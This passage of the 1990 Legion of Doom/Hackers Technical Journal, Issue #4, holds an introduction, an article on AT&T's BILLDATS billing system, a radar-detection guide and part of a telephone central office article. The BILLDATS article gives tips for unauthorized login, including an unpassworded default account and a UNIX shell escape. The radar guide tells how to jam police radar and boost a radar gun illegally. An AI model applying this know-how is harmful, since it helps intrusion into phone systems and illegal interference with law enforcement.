Copy Link
Add to Bookmark
Report

The Legion of Doom Technical Journal 04

  


The LOD/H Technical Journal, Issue #4: File 01 of 10
Finally Released: May 20, 1990

THE

LOD/H TECHNICAL JOURNAL

INTRODUCTION
-------------


We are still alive. This publication is not released on any schedule. Past
attempts at scheduling issues have failed miserably. The editors refuse to
release issues which are not up to our self-defined standards. We have in the
past, and will continue in the future, to accept articles from anyone (e.g.
non LOD) as long as the articles adhere to our basic format and style. The
editors review all articles to verify accuracy and integrity however it may
not be possible in all cases to check every fact. Plagiarized material is not
acceptable and we make every attempt to verify an article's originality. When
referenced material is used, the source for that material must be clearly
stated. The more articles we receive the sooner each issue is released. There
is a minimum 2 month review and editing period for each article. If you want
to contribute articles contact any member and they will forward articles to
the editors.

There seems to be some confusion as to what writers are (or were) in LOD/H and
what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT
MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current
member list follows:

Lord Havok
Lex Luthor
Prime Suspect
Phase Jitter
Professor Falken
Skinny Puppy

File 06: The History of LOD/H is a short article explaining the origin of the
group. We realize this is of interest to only a few, and most people probably
could care less. However, also included is a list of EVERY member who was ever
in the group. This is to clear up any and all misconceptions about members.
The press, telecommunications and computer security people, law enforcement,
and others can finally get their facts straight [See Issue #3, article 10,
Clearing up the mythical LOD/H Busts for a prime example, and also in the
Network News and Notes section -- first two articles regarding more so called
'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS
who give system access to individuals solely because they are a member of some
respected group are urged to verify the hacker's identity as best they can. No
one should be taken on their word alone.

This issue is dedicated to the three (now "retired") members who recently
received visits from our friends and yours, the U.S. Secret Service and
Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see
the Network News and Notes section for the stories.
Although the TJ is distributed to many boards, the inability for any decent
board to consistently remain online prevents us from utilizing "sponsor"
boards as distribution hubs. Therefore, the TJ will be distributed to whatever
boards are around at the time of release. Due to the lack of boards the
newsletter will be distributed in diskette form to those who can help in its
distribution.


___________________________________________________________________________

TABLE OF CONTENTS


Name of article or file Author Size
-----------------------------------------------------------------------------
01 Introduction to the LOD/H Technical Journal Staff 04K
and Table Of Contents for Issue #4

02 The AT&T BILLDATS Collector System Rogue Fed 14K

03 The RADAR Guidebook Professor Falken 17K

04 Central Office Operations Agent Steal 32K

05 A Hackers Guide to UUCP The Mentor 27K

06 The History Of LOD/H Lex Luthor 12K

07 The Trasher's Handbook to BMOSS Spherical Abberation 11K

08 The LOD/H Telenet Directory Update #4 Part A Lord Havok 65K

09 The LOD/H Telenet Directory Update #4 Part B Lord Havok 43K

10 Network News and Notes Staff 38K


Total: 7 Articles 10 Files 263K

____________________________________________________________________________

End Of Intro/TOC
Issue #4
The LOD/H Technical Journal, Issue #4: File 02 of 10


The AT&T BILLDATS Collector
Written by:
Rogue Fed

==============================================================================


NOTES: This article will hopefully give you a better understanding of how
the billing process occurs. BILLDATS is just one part of the billing picture.
Before I began working for the government, I was a Telco employee and thus,
the information within this article has been learned through experience.
Unfortunately, I was only employed for a few months (including training on
BILLDATS) and am still learning more about the many systems that a telco uses.
There are however, a couple of lists that were compiled and slightly modified
from what little reference material I could smuggle out and my notes from the
training class. This article does require a cursory knowledge of telco and
computer operations (ie. switching, SCCS, UNIX).


INTRODUCTION -
==============

BILLDATS - BILLing DATa System

BILLDATS can be explained in a nutshell by the acronym listed above. If it's
one thing telecommunications providers do well, it's creating acronyms.
Basically, BILLDATS collects billing information (that's why they call it a
Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs
are situated in or close to switching offices and are connected to BILLDATS
either through dedicated or dial-up lines. BILLDATS can be considered as
the "middleman" in the billing process. The system collects, validates, and
adds identification information regarding origination and destination. This
is then transferred to tape (or transmitted directly) to the RPC (Regional
Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO
actually processes the billing information. Typically the BILLDATS system is
located in the same or adjoining building (but can be across town) to
the RPC/RAO.

BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses
a combination of software. The software base is UNIX and the BILLDATS Generic
program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS
switches use).

Some of the more interesting features BILLDATS possesses are:

* Can be accessed via dialup (always a plus).
* Runs under UNIX (another plus).
* Interface with SCCS (yet another plus).
* Can store about 12 million calls for the first two disks and about
8 million calls for each additional disk. A total of 6 (675 MB) disks
can be used.
* Inserts the sensor type and ID and recording office type and ID onto
every AMA record that it collects.
* Capable of collecting information from nearly 600 AMATs.

To better understand how/why you get a bill after making long distance phone
calls, I have delineated the steps involved.

You call Hacker X and tell him all about the latest busts that have occurred,
he exclaims "Oh Shit!" hangs up on you and throws all his hacking information
into the fireplace. The actual call is referred to as a call event. As each
event happens (upon termination of the call) the event is recorded by the
switch. This information is then sent via an AMA Transmitter which formats the
information and then sends it to BILLDATS (commonly called a "Host
Collector"). BILLDATS then provides the information to the RAO/RPC. The
billing computer is located at the RAO/RPC. Do not confuse the actual billing
system with BILLDATS! The billing computer:

* Contains customer records
* Credit ratings (in some telcos)
* Totals and prints the bill
* Generates messages when customers do not pay (ie. last chance and
temporary termination of service)

When the billing period is over, (typically 25-30 days), many events (it
depends on how many calls you have made) have accumulated. A bill is then
generated and mailed to you.


COLLECTION -
============

BILLDATS collects information in two ways:

1. AMATs
2. Users

AMAT input
----------

BILLDATS collects data from the AMAT either directly from the switch, or from
a front end which performs some processing on the data before giving it to
BILLDATS. The data I am talking about here is usually AMA billing information.
The information is in the usual AMA format (see Phantom Phreaker's article in
the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As
I said earlier, the recording office and sensor types and IDs have to be
added by BILLDATS. The other information that is transmitted is usually
maintenance data.

The data that is transferred between BILLDATS and an AMAT is accomplished
over either dedicated or dialup lines using the BX.25 protocol. This protocol
has been adopted by the telecommunications industry as a whole. It is
basically a modified version of X.25.

User input
----------

This is simply sysadmin and sysop information.


INSERTED INFORMATION -
======================

Once the information is collected, additional data (mentioned earlier)
must be inserted. The information that BILLDATS inserts into the AMA records
it receives depends on whether the AMAT is a single or multi-switch AMAT.
Either way, the data is passed through the DEP. The DEP is a module which
is part of the LHS (Link Handler Subsystem) that actually inserts the
additional data. It also performs other functions which are rather
uninteresting to the hacker. The LHS manages the x-mission of all the
collected information. This is either through dedicated or dialup lines. The
LHS is responsible for:

* Logging of statistics as related to the performance of links.
* Polling of remote switches for maintenance and billing information.
* Passing information to the DEP in which additional information is
inserted.
* Storing billing information.
* Other boring stuff.


AMATS -
=======

Basically an AMAT is a front end to the switch. The AMAT:

* Gets AMA information from the switch.
* Formats and processes the information.
* Transmits it to BILLDATS.
* An AMAT can also store information for up to 1 week.

The following is a list of switches and their related AMAT equipment that
BILLDATS obtains billing information from:

1A ESS: This is usually connected to a 3B APS (Attached Processor System) or
BILLDATS AMAT.
2ESS: This is connected to an IBM Series 1 AMAT.
2BESS: Connected to a BILLDATS AMAT.
4ESS: Connects to 3B APS.
5ESS: Direct connection.
TSPS 3B:Direct connection.
DMS-10: Connects to IBM Series 1 AMAT.

There are other AMATs/Switches but they must be compatible with the BILLDATS
interface.


ACCESSING BILLDATS -
====================

Even though a system is UNIX based, that doesn't mean that it is a piece of
cake to get into. Surprisingly (when you think about the average Intelligence
Quotient of telco personnel) but not surprisingly (when you consider that the
information contained on the system is BILLING information--the life blood of
the phone company) BILLDATS is a little more secure than your average telco
system, except for the fact the all login IDs are 5 lower case characters or
less. BILLDATS can usually be identified by:

bcxxxx 3bunix SV_R2+

where:

bc = B(ILLDATS) C(ollector).
xxxx = The node suffix. This is entered when the current Generic is installed.
3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system.
SV_R2+ = Software Version.

The good news is that there is a default username when the system is
installed. The bad news is that upon logon, the system forces you to choose a
password. The default username is not passworded initially. The added security
feature is simply that the system forces all usernames to have passwords. If
it doesn't have an associated password, the system will give you the message:

"Your password has expired. Choose a new one"

A 6-8 character password must then be entered. After this you will be asked
to enter the terminal type. The ones provided are AT&T terminals (615, 4425,
and 5420 models). Once entered a welcome message will probably be displayed:

"Welcome to the South Western Bell BILLDATS Collector"
"Generic 3, Issue 1"
"Tuesday 01 Aug 1989 12:44:44 PM"

dallas>

The BILLDATS prompt was displayed "dallas>" where dallas is the node name.

There are 3 privilege levels within BILLDATS:

1. Administrator
2. Operator
3. UUCP

* Administrator privs are basically root privs.
* An account with Operator privs can still do about anything an Admin can do
except make data base changes.
* UUCP privs are the lowest and allow file transfer.


Commands
--------

Just like SCCS, UNIX commands can be entered while using BILLDATS. The format
is:

dallas>run-unx:$unix cmd;

All unix commands must be preceded by "run-unx:" and end with a semicolon ";".
The semicolon is the command terminator character (just like Carriage Return).

BILLDATS isn't exactly user friendly, but it does have on-line help. There are
a number of ways that it can be obtained:

dallas> help-?; or help-??; or ?-help; or ??-help;

If you want specific help:

dallas> help-(command name);

I can list commands forever, but between UNIX (commands every hacker should
be familiar with) and help (any moron can use it), you can figure out which
ones are important.


Error Messages
--------------

Just like SCCS, BILLDATS has some rather cryptic error messages. There are
thousands of error messages, once you know a little about the format they
are easier to understand. When a mistake is made, something similar to
the following will appear:

UI0029 (attempted command) is not a valid input string.

^ ^- error message information
|
|-- This is the subsystem and error message number

The following is a brief description of subsystem abbreviations:

BD: BILLDATS system utilities. Errors associated with the use of utility
programs will be displayed.
DB: Data Base manager. These messages are generated when accessing or
attempting to access the various Data Bases (explained later) within
BILLDATS.
DM: Disk Manager. Basically, information pertaining to the system disk(s).
EA: Error and Alarm. As the name implies, system errors and alarms.
LH: Link Handler. Messages related to data link activity, either between
BILLDATS and the AMAT or BILLDATS and the RAO/RPC.
SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon.
BILLDATS uses cron to schedule things like when to access remote systems.
TW: Tape Writer. Messages related to storing billing information on tapes
which will then be transported to the RAO/RPC.
UI: User Interface. This was used in the above example. Displays syntax,
range or status errors when entering commands.
DL: Direct Link. Instead of BILLDATS information being written to tape, a
direct link to the RPC/RAO mainframe (the actual billing system computer)
can be accomplished. This is usually done when BILLDATS is located far
away from the RPC/RAO office as there is always some risk involved in
transporting tapes, and that risk increases the farther away the two
offices are. Another neat thing about Direct Link is that the billing data
can be sent across a LAN (Local Area Network) also. Obviously this incurs
some concerns regarding security, but from what I have heard and seen,
AT&T and the BOC's typically choose to ignore the security of their
systems which suits me just fine. The Direct Link is an optional BILLDATS
feature and if it is in use, messages related to its operation are
displayed with the DL prefix.


BILLDATS DATA BASES -
=====================

The databases contain all kinds of useful information such as usernames,
switch types, scheduled polling times, etc.

The AMAT Data Base contains:

* Type of switch
* Sensor type and identification
* AMAT phone number
* Channel and port number/group
* Other boring information

The Port Data Base contains:

* Communications information (like L-Dialers on UNIX Sys. V)
* Channel and port information
* Other boring information

The Collector Data Base contains:

* Collector office ID
* Version number of the Data Base
* Number and speed of any remote terminals
* When reports are scheduled for output
* Other boring information


CONCLUSION -
============

If you are not technically oriented, I hope this article helped you understand
how you get your bill. I assumed that you would skip over the commands for
using BILLDATS and similar information.

If you are technically oriented, I hope I not only helped you understand more
about the billing process, but also increased your awareness of how detailed
the whole process is. And if you do happen to stumble onto a BILLDATS system,
you have been pointed in the right direction as far as using it correctly is
concerned.

I tried to leave out all the boring details, but some may have slipped by me.
I reserved the right to omit specific details and instructions regarding any
alteration or deletion of calls/charges for my own use/abuse.

The Rogue Federal Agent


[ End Of Article ]

The LOD/H Technical Journal, Issue #4: File 03 of 10


The Radar Guidebook
by
Professor Falken


-----------------------------------------------------------------------------

Anyone who has driven a car without a radar detector before, has gotten
that paranoid feeling that the cops are around radaring. This feeling is not
a nice one; it is the feeling that somewhere somehow someone is watching you.
In this article I will attempt to explain how radar guns work, what bands
the guns work on, why they are wrong 70% of the time, how to employ stealth
technology in defeating the radar, and last but not least jamming the radar.

RADAR stands for RAdio Detecting And Ranging. A speed-radar gun works
under the Doppler theory. This theory is that when a signal is reflected off
an object moving toward you, the signal will be at a higher frequency than the
initial frequency, this increase in frequency is used to calculate speed.
Many of you have experienced the Doppler effect, which occurs when a noise
from a siren increases in strength (gets louder) as it approaches and
decreases in strength (gets softer) as it moves away from you.

Right now in the United States, there are three bands that are Federal
Communication Commission (FCC) certified for "field disturbance sensors",
known to you and me as radar guns. These bands have proper non-technical
names, and all operate in the GigaHertz range. GigaHertz is a measure of
frequency; one GHz equals one billion cycles per second. Most frequency
modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band,
in MegaHertz that is 88 MHz to 108 MHz. The three proper names for these
radar bands are: X, K, and Ka.

One of the older radar bands is the X band. X band radar is the most
commonly used radar band in the United States. X band radar transmits its
signal at 10.5250 GHz. The wattage of the radar's signal really depends upon
the gun manufacturer. However, most manufacturers agree that a 100 milliwatt
signal is "High-Power" and the 40 milliwatt range is "Low Power". The gun's
range also depends upon the manufacturer. The average maximum range of a X
band gun is 2500 feet. That estimate is based on the assumption that the gun
is operating at full-strength (100mw). Most radar detectors give off a
false signals on this band due to ultrasonic motion detectors employed
by various burglar alarm systems. Large grocery stores also use these to
open the doors magically as you walk in or out.

Another older band is K band. K band operates on 24.150 GHz and is not as
popular as X band, but it is gaining in usage throughout the country. The
normal signal strength of K band guns again depends upon the manufacturer,
but the ones I've seen all operate at 100 milliwatts at high-power. These
guns have a maximum range of 3000 feet, assuming they are at 100mw signal
strength.

A new type of radar has been introduced and assigned a frequency by the
Federal Communications Commission. This new band has been assigned the name
Ka and has been designated a frequency of 34.360 GHz. Current Ka technology
gives the gun a maximum effective range of 40 to 200 feet. This band
was originally made for use with photo-radar. The photo-radar can be set up
on a tripod on the side of the road or in the back of a police car. The
user then triggers a button when he wants a car in the guns range
clocked, automatically taking a picture of the car & license plate.
At the time the photograph is taken a date and time is imprinted on the
picture. The police keep one duplicate for archival purposes and sends the
other to the registered owner of the car along with ticket information and the
amount due. This type of system can only work in places that hold the owner
of a vehicle responsible for any violations that occur with the car. The
legal barriers for photo radar to overcome are extensive, most notably, not
giving the vehicle owner due process and the presumption of guilt. There is
a system out now for $19.95 that defeats Ka band photo radar. I expect it to
be illegal VERY QUICKLY once Ka is more widely used. This little baby slips
over your license plate and acts as venetian blinds. When looking straight at
the plate it looks like a normal plate with a black frame. However when
looking at it from a Ka band Photo Radar's angle it looks like a license plate
with a silver streak covering the whole plate, making it impossible to
identify. This device is called the Photobuster and is available from
most radar detector specialty stores.

There are two different types of radar guns. They are Instant-On/Pulse and
Constant Broadcasting Radar. The names are self-explanatory, but I will
explain them anyway. The constant broadcast radar continually transmits
its radar signal, and anything in its path will be clocked. Instant-On &
Pulse radars are basically identical, and are both very deadly since they are
harder to detect as a threat. The Instant-On gun is really nothing more than
an ON/OFF switch for signal transmission. In order to have a pulse gun, all
a cop has to do is purchase one with a "HOLD" feature or just turn the gun
on when he/she wishes to use it. The "HOLD" feature is simply a button that
keeps the gun on but makes sure no signal is being transmitted. No one can
detect a gun that is off or in "HOLD" mode. An officer using an Instant-On
radar gun will periodically check the speed of the traffic. These samplings
can easily be detected and will give the user of a detector prior warning to
a Instant On/Pulse activated radar gun.

Many detectors on the market today provide anti-falsing circuitry. Falsing
is the triggering of the radar detector from something other than a radar gun.

One or two detector manufactures make their detectors with GaAs diodes.
GaAs diodes are Gallium Arsenide diodes which are a military grade electrical
component that helps produce a good signal-to-noise ratio.

All new model radar detectors use Superheterodyne technology.
Superheterodyne, also known as active technology, amplifies all incoming
signals hundreds of times, which makes it more sensitive and selective as to
which signals will trigger an alert. Superheterodyne technology also gives
out a minute internal radar signal of its own, which can be picked up by older
(Pre/Early 1980's) non-anti-falsing radar detectors. If you have a newer
model radar detector, this small internally generated signal is no problem to
your's or anyone's anti-falsing radar detecting unit. NOTE: In states
where radar detectors are illegal (Ex. Virginia, Canada) the police have
devices which detect this Superheterodyne signal. Police can then stop
you and confiscate your detector. Getting around this police tactic
would be to use an early radar detector without Heterodyne/Superheterodyne
detection technology.

Many compact/shirt pocket radar units are "exclusively made with SMD's".
These SMD's are Surface Mounted Devices and contain extremely small resistors,
transistors, diodes, and capacitors. Just because a manufacturer uses SMD's,
that does NOT make the unit any better than a larger detector of the same age.

Cincinnati Microwave Inc., the makers of Escort and Passport say they have
the exclusive technology for the detection and anti-falsing of RASHID VRSS
technology. RASHID VRSS is actually the Rashid Radar Safety Brake Collision
Warning System. It is an electronic device that operates on K band
frequencies and warns heavy trucks and ambulances of hazards in their path.
About 900 RASHID VRSS units have been prototyped in three states. Since the
number of actual operating RASHID units is so minute, I really doubt you will
run into one.

There are two ways a radar gun can produce an incorrect speed reading.
These are known as the Cosine Error and Moving Radar Error. The Cosine Error
occurs when a radar gun gives a lower reading than the actual speed of the
target. This occurs because the gun can only measure the doppler shift that
occurs directly towards or away from the antenna. If the object moves at an
angle to the gun, the shift will be lower than if it moves directly at the
antenna. Therefore the reading the radar gun gives will be less than the
actual speed of the object. The radar reading can be calculated by taking
the Actual Speed times the cosine of the incidence angle. So if the target
car's actual speed is 50 miles per hour and it is 37 degrees off of the
mainline radar signal, the radar speed will be 40 miles per hour. Look:

Cosine Error Theory:
Actual Speed x Cosine of Incidence Angle = Radar's Shown Speed

Cosine of 37 degrees is 0.80
50 MPH x 0.80 = 40 MPH

So if you see a radar enabled cop coming head-on towards you it would be a
good idea to get into the right hand lane, or further if possible, as this
increases the angle and thus lowers your radar speed. The other error is the
Moving Radar Error, which occurs only when a police car is using a moving
radar gun. A false reading is obtained by the unit because before it
can radar you it must radar something along side the road to get the patrol
car's speed. Most often, billboards and parked cars are used for this initial
patrol car speed calibration. It is susceptible to errors because of the
Cosine Error, mentioned above. Once the patrol car has its speed (wrong or
not), it assumes that the target's (YOU) speed is the difference between the
highest oncoming signal and the patrol speed; but if the patrol speed is lower
it will ADD that error on to the target speed. So the target speed (YOU) will
read higher than you were actually traveling. Here's the theory and a
problem:

Moving Radar Theory:
Closing Speed - Patrol Speed = Target Speed

The ACTUAL speeds for these are:
Patrol Car Speed - 60 MPH
Target Car Speed - 60 MPH
Closing Speed - 120 MPH

Due to the Cosine Error the TARGET CAR's speed will cause the gun to
calculate a LOW reading for the actual patrol car's speed due to the cosine
error.

The RADAR calculated speeds are:
Patrol Car Speed - 50 MPH
Target Car Speed - 70 MPH
Closing Speed - 120 MPH

Thus you can see how the police car is going to get an incorrect reading.
This is a good one to memorize and bring into court for any tickets.

It's been recently brought to my attention that there are stealth-bras for
cars. From what I understand, the bras actually absorb the radar, and reflect
such a weakened signal that the radar gun cannot detect it. I have not seen
one of these in person, but from what I have heard they are made out of a VERY
DENSE rubber/metal composite. The bra probably traps the signal very much
like the F-117/B-2 stealth aircraft do. The material is probably made up of
hexagonal shaped cells, the back of the cell being at a slight angle, so that
any signal coming into the cell will have to bounce around within the cell
before exiting it. The inside of each cell is filled with a radar absorbing
material. As the signal hits the back of the hexagonal cell it is bounced
around inside the cell through the absorbing material, weakening the signal
each time it does so. Upon leaving the cell, the signal is so weak the
radar's receiver may not pick up the signal until the target is near enough
to give a positive return on the radar screen. When the aircraft is getting
closer, within radar range, the signal reflected may be so small the radar's
controller may think he is picking up ground interference, a flock of birds
or possibly bad weather. The actual radar absorbing material is classified at
this time by the government. The actual composite on the car bra is certainly
not as good as the actual radar absorption material of the aircraft, but I'm
sure it is somewhat similar.

Radar jamming is done very much the way any other type of radio jamming is
done. You simply overpower the frequency being used with a frequency of your
own. Radar jamming/overpowering is ILLEGAL in the United States. To jam a
signal all you need is a transmitter, an amplifier and an antenna. To jam a
gun using a K band radar (24.150 GHz) all you do is get a transmitter that can
transmit in the 20 GHz range and a 10-100 watt amplifier and antenna. Send
out a signal at around 24.05 GHz. This signal will make the cop's radar
either show a 0 or an incredibly slow speed such as -520. Usually the
cop's radar cannot show a negative sign, so it will just be 520. This
10-100 watt signal that you are transmitting will overpower the signal
his/her radar sent out and is waiting to receive. His/her gun is only at
100 milliwatts, and you're transmitting at 10-100 watts; its like using a
12-gauge shotgun against a rodent.

Where can you get microwave transmission equipment? You can check local
electronic shops, satellite stores, Cable TV companies and local television
stations as to where they buy their microwave transmission gear. Or you can
buy a radar gun of your own, and leave it ON whenever your driving. This will
give the cop's gun a very strange reading, most likely zero. If it is
possible, once you have the gun bring it to a "corrupt" electronics shop and
have it modified for high powered transmission, preferably in the 10 to 100
watt range.

Some radar guns have resistors implemented just before the antenna, but
just after the amplifier for de-amplification of the transmitter's signal.
This means that most guns already have a good (1 watt or so) transmit
capacity, but it is suppressed to bring the actual transmit signal to the
100mw area. The owner of the gun only has to know which resistors to take
out, then he/she will have a functional high powered gun. If this small
wattage does not satisfy you, you may have to purchase a separate amplifier
for the gun, and have it wired directly into the radar's transmitter antenna.
This modification is expensive not to mention illegal, but then again what the
hell isn't these days. I have seen six different types of guns offered from
National Radar Exchange. The following are a few major radar gun
manufacturers that are sold out of most radar shops. They are:

KUSTOM SIGNAL:
Kustom Signal HR-12 K Band 100mw signal 2000-3000 foot maximum range $695.00
Kustom Signal HR-8 K Band 100mw signal 1800-3000 foot maximum range $495.00

CMI INC.:
Speedgun One X Band 100mw signal 1000-2500 foot maximum range $395.00
Speedgun Six X Band 100mw signal 1000-2500 foot maximum range $495.00
(Since these units are the same, the only differences are things like
last speed reading recall, 10 number memory, etc.)

MPH INC.:

MPH K-55 X Band 40mw signal 1200-2500 foot maximum range $495.00
(Can clock target in 1/2 second, which is exceptionally fast for radar guns)

The only differences between the models are their bands and their options,
such as a "HOLD" button, last speed recorded etc.

I have found these to be some of the top units in the radar detector world
currently and are listed as follows:

MOST SENSITIVE MOST FEATURES BEST LOOKING MOST RELIABLE SMALLEST
-------------- ------------- ------------ ------------- -------------
COBRA 4120 COBRA 4120 Whistler 3SE ESCORT Uniden RD-9XL
BEL 944 COBRA 3160 BELL 944 K40 Whistler 3SE
Snooper 6000 BELL 944 Uniden RD-9XL

BEST VALUE LOUDEST BEST FILTERED
------------ -------------- ------------------
Snooper 4000 COBRA 5110 Snooper 6000
Cobra 5110 COBRA 3120 Other Snoopers
Cobra 3168 Whistler Q2002
Maxon RD25

I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's
"Vector 3", "Express", nor it's newer "Legend 3."

Just because a detector is the MOST sensitive doesn't mean it is the best
detector. Because of the sensitivity you could pick up more alarms. What
you want is a detector with excellent sensitivity, but good anti-falsing
circuitry.

I hope this article has given you some insight on how radars work and
how their tickets CAN be defeated. Keep safe and sane,

Professor Falken
Legion Of Doom


<EOF>
The LOD/H Technical Journal, Issue #4: File 04 of 10


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ Central Office Operations $
$ Western Electric 1ESS,1AESS, $
$ The end office network environment $
$ $
$ Written by Agent Steal 1989 $
$ $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Topics covered in this article will be:

Call tracing
RCMAC
Input/output messages
SCC and SCCS
COSMOS and LMOS
BLV, (REMOB) and "No test trunks"
Recent change messages
Equal Access

Did I get your attention? Good, everyone should read this. With the time,
effort, and balls it has taken me compile this knowledge it is certainly worth
your time. I hope you appreciate me taking the time to write this.

I should point out that the information in this article is correct to the
best of my knowledge. I'm sure there are going to be people that disagree
with me on some of it, particularly the references to tracing. However, I
have been involved in telecommunications and computers for 12+ years.

I'm basing this article around the 1AESS since it is the most common
switch in use today.


** OUTSIDE PLANT **

This is the wiring between your telephone and the central office. That is
another topic in itself. If you are interested read Phucked Agent 04's article
on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal,
Issue #1. The article explains those green boxes you see on street corners,
aerial cables, manholes etc. So where that article stops, this one starts.


** CABLE VAULT **

All of the cables from other offices and from subscribers enter the
central office underground. They enter into a room called the cable vault.
This is a room generally in the basement located at one end or another of the
building. The width of the room varies but runs the entire length of the
building. Outside cables appear through holes in the wall. The cables then run
up through holes in the ceiling to the frame room.

Understand that each of these cables consist of an average of 3600 pairs
of wires. That's 3600 telephone lines. The amount of cables obviously depends
on the size of the office. All cables (e.g. interoffice, local lines, fiber
optic, coaxial) enter through the cable vault.


** FRAME ROOM **

The frame is where the cable separates into individual pairs and attach
to connectors. The frame runs the length of the building, from floor to
ceiling. There are two sides to the frame, the horizontal side and the
vertical side. The vertical side is where the outside wiring attaches and the
protector fuses reside. The horizontal side is where the connectors to the
switching system reside. Multi-conductor cables run from the connectors to
actual switching equipment. So what we have is a large frame called the Main
Distribution Frame (MDF) running the entire length of the building. From floor
to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the
HDF. Cables from outside connect on one side and cables from the switching
equipment connect to the other side and jumper wires connect the two. This way
any piece of equipment can be connected to any incoming "cable pair". These
jumper wires are simply 2 conductor twisted pair, running between the VDF and
the HDF.

What does all this mean? Well if you had access to COSMOS you would see
information regarding cable and pair and "OE" (Office Equipment). With this
information you could find your line on the frame and on the switch. The VDF
side is clearly marked by cable and pair at the top of the frame, however the
HDF side is a little more complicated and varies in format from frame to frame
and from switch to switch. Since I am writing this article around the 1AESS,
I will describe the OE format used for that switch.

OE ABB-CDD-EFF

Where..

A = Control Group (when more than one switch exists in that C.O.)
B = LN Line Link Network
C = LS Line Switching Frame
D = CONC or CONCentrator
E = Switch (individual, not the big one)
F = Level

There is one more frame designation called LOC or LOCation. This gives the
location of the connector block on the HDF side. Very simply, looking at the
frame:


H ---------------------------------------------------------------------

G ---------------------------------------------------------------------

F ---------------------------------------------------------------------

E ---------------------------------------------------------------------

D ---------------------------------------------------------------------

C ---------------------------------------------------------------------

B ---------------------------------------------------------------------

A ---------------------------------------------------------------------

123456789 etc.

Please note that what you are looking at here represents the HDF side of
the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a
connector block containing connections for 4 x 24 (which is 96) pairs.

So far I've covered how the wires get from you to the switching
equipment. Now we get to the switching system itself.


** SWITCHING SYSTEMS **

Writing an article that covers them all would be lengthy indeed. So I am
only going to list the major ones and a brief description of each.

- Step by Step
Strowger 1889
First automatic, required no operators for local calls
No custom calling or touch tone
Manufactured by many different companies in different versions
Hard wire routing instructions, could not choose an alternate route if
programed route was busy
Each dial pulse tripped a "stepper" type relay to find its path

- No.1 Crossbar 1930
- No.5 Crossbar 1947 (faster, more capacity)
Western Electric
First ability to find idle trunks for call routing
No custom calling, or equal access
Utilized 10x20 cross point relay switches
Hard wired common control logic for program control
Also copied by other manufactures

- No.4 Crossbar
Used as a toll switch for AT&T's long lines network
4 wire tandem switching
Not usually used for local loop switching

- No.1ESS 1966
- No.1AESS 1973
Western Electric
Described in detail later

- No.1EAX
GTE Automatic Electric
GTE's version of the 1AESS
Slower and louder

- No.2ESS 1967
- No.2BESS 1974
Western Electric
Analog switching under digital control
Very similar to the No.1ESS and No.1AESS
Downsized for smaller applications

_ No.3ESS
Western Electric
Analog switching under digital control
Even smaller version of No.1AESS
Rural applications for up to 4500 lines

- No.2EAX
GTE Automatic Electric
Smaller version of 1EAX
Analog switch under digital control

- No.4ESS
Western Electric
Toll switch, 4 wire tandem
Digital switching
Uses the 1AESS processor

- No.3EAX
Gee is there a pattern here? No GTE
Digital Toll switch
4 wire tandem switching

- No.5ESS
AT&T Network Systems
Full scale computerized digital switching
ISDN compatibility
Utilizes time sharing technology
Toll or end office

- DMS 100 Digital Matrix Switch
Northern Telecom
Similar to 5ESS
Runs slower
Considerably less expensive

- DMS 200
Toll and Access Tandem
Optional operator services

- DMS 250
Toll switch designed for common carriers

- DMS 300
Toll switch for international gateways

- No.5EAX
GTE Automatic Electric
Same as above

How much does a switch cost? A fully equipped 5ESS for a 40,000
subscriber end office can cost well over 3 million dollars. Now you know why
your phone bill is so much. Well...maybe you parents bill.


** The 1ESS and 1AESS **

This was the first switch of it's type put into widespread use by Bell.
Primarily an analog switch under digital control, the switch is no longer
being manufactured. The 1ESS has been replaced by the 5ESS and other full
scale digital switches, however, it is still by far the most common switch
used in today's Class 5 end offices.

The #1 and 1A use a crosspoint matrix similar to the X-bar. The primary
switch used in the matrix is the ferreed (remreed in the 1A). It is a two
state magnetic alloy switch. It is basically a magnetic switch that does not
require voltage to stay in it's present position. A voltage is only required
to change the state of the switch.

The No. 1 utilized a computer style, common control and memory. Memory
used by the #1 changed with technology, but most have been upgraded to RAM.
Line scanners monitor the status of customer lines, crosspoint switches,
and all internal, outgoing, and incoming trunks, reporting their status to
the central control. The central control then either calls upon program or
call store memories to chose which crosspoints to activate for processing the
call. The crosspoint matrices are controlled via central pulse distributors
which in turn are controlled by the central control via data buses. All of
the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen
to data buses for their address and command or report their information on
the buses. The buses are merely cables connecting the different units to the
central control.

The 1E was quickly replaced by the 1A due to advances in technology. So
1A's are more common, also many of the 1E's have been upgraded to a 1A.
This meant changing the ferreed to the remreed relay, adding additional
peripheral component controllers (to free up central controller load) and
implementation of the 1A processor. The 1A processor replaced older style
electronics with integrated circuits. Both switches operate similarly.
The primary differences were speed and capacity. The #1ESS could process
110,000 calls per hour and serve 128,000 lines.

Most of the major common control elements are either fully or partially
duplicated to ensure reliability. Systems run simultaneously and are checked
against each other for errors. When a problem occurs the system will double
check, reroute, or switch over to auxiliary to continue system operation.
Alarms are also reported to the maintenance console and are in turn printed
out on a printer near the control console.

Operation of the switch is done through the Master Control Center (MCC)
panel and/or a terminal. Remote operation is also done through input/output
channels. These channels have different functions and therefore receive
different types of output messages and have different abilities as for what
type of commands they are allowed to issue. Here is a list of the commonly
used TTY channels.

Maintenance - Primary channel for testing, enable, disable etc.
Recent Change - Changes in class of service, calling features etc.
Administrative - Traffic information and control
Supplementary - Traffic information supplied to automatic network control
SCC Maint. - Switching Control Center interface
Plant Serv.Cent.- Reports testing information to test facilities

